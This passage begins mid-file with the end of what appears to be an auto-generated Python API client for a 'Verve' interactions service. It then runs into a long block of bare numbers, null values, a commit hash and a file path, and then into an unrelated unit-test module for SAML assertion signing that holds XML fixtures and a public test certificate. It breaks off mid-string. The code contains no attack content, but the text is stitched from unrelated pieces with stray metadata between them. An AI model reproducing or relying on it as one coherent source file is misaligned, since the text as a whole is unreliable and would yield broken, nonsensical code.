params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'category_name' in params: form_params.append(('categoryName', params['category_name'])) if 'category_description' in params: form_params.append(('categoryDescription', params['category_description'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def update_response(self, response_id, response, requester_id, client_token, **kwargs): """ Update response Allows the user to update an response. Returns the updated response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_response(response_id, response, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str response: response (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.update_response_with_http_info(response_id, response, requester_id, client_token, **kwargs) else: (data) = self.update_response_with_http_info(response_id, response, requester_id, client_token, **kwargs) return data def update_response_with_http_info(self, response_id, response, requester_id, client_token, **kwargs): """ Update response Allows the user to update an response. Returns the updated response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_response_with_http_info(response_id, response, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str response: response (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['response_id', 'response', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `update_response`") # verify the required parameter 'response' is set if ('response' not in params) or (params['response'] is None): raise ValueError("Missing the required parameter `response` when calling `update_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `update_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `update_response`") resource_path = '/interactions/responses/{responseId}'.replace('{format}', 'json') path_params = {} if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'response' in params: form_params.append(('response', params['response'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'))
57.871152
583
0.624195
28,436
263,198
5.59706
0.013152
0.038773
0.033175
0.030963
0.98663
0.981276
0.978543
0.974786
0.971425
0.965437
0
0.007279
0.297932
263,198
4,547
584
57.883879
0.854045
0.441383
0
0.81592
0
0
0.254012
0.060307
0
0
0
0
0
1
0.030303
false
0
0.003166
0
0.078697
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
71e756ec18cb00cddfdb014e810af003956d5f0a
23,700
py
Python
idptest/tests/test_signing.py
NoodleMarkets/dj-saml-idp
ba2a4ef59b6bd35ac652066a08c1aedfbd8779fc
[ "MIT" ]
2
2019-12-23T06:30:10.000Z
2022-02-19T21:05:52.000Z
idptest/tests/test_signing.py
NoodleMarkets/dj-saml-idp
ba2a4ef59b6bd35ac652066a08c1aedfbd8779fc
[ "MIT" ]
null
null
null
idptest/tests/test_signing.py
NoodleMarkets/dj-saml-idp
ba2a4ef59b6bd35ac652066a08c1aedfbd8779fc
[ "MIT" ]
2
2018-06-26T06:20:25.000Z
2020-07-21T02:43:59.000Z
# -*- coding: utf-8 -*- from __future__ import absolute_import import os import unittest import lxml.etree as ET from xmlunittest import XmlTestMixin from saml2idp import xml_render from saml2idp import xml_signing, xml_templates from saml2idp import saml2idp_metadata as smd from saml2idp.xml_signing import get_signature_xml IDP_PARAMS = { 'ISSUER': 'http://127.0.0.1:8000', } REQUEST_PARAMS = { 'ACS_URL': 'https://www.example.net/a/example.com/acs', 'REQUEST_ID': 'mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi', } ASSERTION_SALESFORCE_PARAMS = { 'ASSERTION_ID': '_7ccdda8bc6b328570c03b218d7521772998da45374', 'ASSERTION_SIGNATURE': '', # it's unsigned 'AUDIENCE': 'example.net', 'AUTH_INSTANT': '2011-08-11T23:38:34Z', 'ISSUE_INSTANT': '2011-08-11T23:38:34Z', 'NOT_BEFORE': '2011-08-11T23:38:04Z', 'NOT_ON_OR_AFTER': '2011-08-11T23:43:34Z', 'SESSION_NOT_ON_OR_AFTER': '2011-08-12T07:38:34Z', 'SP_NAME_QUALIFIER': 'example.net', 'SUBJECT': 'randomuser@example.com', 'SUBJECT_FORMAT': 'urn:oasis:names:tc:SAML:2.0:nameid-format:email', '': 'b7HwOJQgKYvhWcrUH17T8WXTY24=' } ASSERTION_SALESFORCE_STR = '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion>' ASSERTION_SALESFORCE_XML = ET.XML(ASSERTION_SALESFORCE_STR) SIGNED_ASSERTION_SALESFORCE_STR = '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_7ccdda8bc6b328570c03b218d7521772998da45374"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>b7HwOJQgKYvhWcrUH17T8WXTY24=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WP+9aFiuj52WLW6ebwSaQhF2nU/wtyP3E2dudTa6mVTSjItpqduUqWR3rp/q39Hsehde6i+4RlbGQkZUwZSPEw==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion>' SIGNED_ASSERTION_SALESFORCE_XML = ET.XML(SIGNED_ASSERTION_SALESFORCE_STR) RESPONSE_PARAMS = { 'ASSERTION': '', 'ISSUE_INSTANT': '2011-08-11T23:38:34Z', 'NOT_ON_OR_AFTER': '2011-08-11T23:43:34Z', 'RESPONSE_ID': '_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4', 'RESPONSE_SIGNATURE': '', 'SP_NAME_QUALIFIER': 'example.net', 'SUBJECT': 'randomuser@example.com', 'SUBJECT_FORMAT': 'urn:oasis:names:tc:SAML:2.0:nameid-format:email', } RESPONSE_XML = '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://www.example.net/a/example.com/acs" ID="_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4" InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://127.0.0.1:8000</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"></samlp:StatusCode></samlp:Status><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion></samlp:Response>' RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML = '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://www.example.net/a/example.com/acs" ID="_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4" InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://127.0.0.1:8000</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"></samlp:StatusCode></samlp:Status><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_7ccdda8bc6b328570c03b218d7521772998da45374"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>b7HwOJQgKYvhWcrUH17T8WXTY24=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WP+9aFiuj52WLW6ebwSaQhF2nU/wtyP3E2dudTa6mVTSjItpqduUqWR3rp/q39Hsehde6i+4RlbGQkZUwZSPEw==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion></samlp:Response>' SIGNED_RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML = '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://www.example.net/a/example.com/acs" ID="_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4" InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>sxi1OztMxi2taVoT3kxaVXQrVx4=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>tErJwi7CBpFWXQRKxEcpkoNZKDv2D1D1hBOlEWWYOyrU5eGaaLFrQ/dMA3D7S0lGjGEf7YkkgiZOAE4dKVHhUg==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"></samlp:StatusCode></samlp:Status><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_7ccdda8bc6b328570c03b218d7521772998da45374"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>b7HwOJQgKYvhWcrUH17T8WXTY24=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WP+9aFiuj52WLW6ebwSaQhF2nU/wtyP3E2dudTa6mVTSjItpqduUqWR3rp/q39Hsehde6i+4RlbGQkZUwZSPEw==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion></samlp:Response>' X509_CERTIFICATE_DATA = "MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==" # noqa class XmlTest(unittest.TestCase, XmlTestMixin): def _test(self, got, exp): if type(got) != str: got = ET.tostring(got, method='c14n', exclusive=True).decode('utf-8') if type(exp) != str: exp = ET.tostring(exp, method='c14n', exclusive=True).decode('utf-8') self.assertXmlDocument(got) self.assertXmlEquivalentOutputs(got, exp) def _test_template(self, template_source, parameters, exp): xml_render._get_in_response_to(parameters) got = template_source(parameters).get_xml_string() self._test(got, exp) class TestSigning(XmlTest): def test1(self): signature_xml = get_signature_xml("this is a test", 'abcd' * 10) expected_xml = '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#abcdabcdabcdabcdabcdabcdabcdabcdabcdabcd"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod 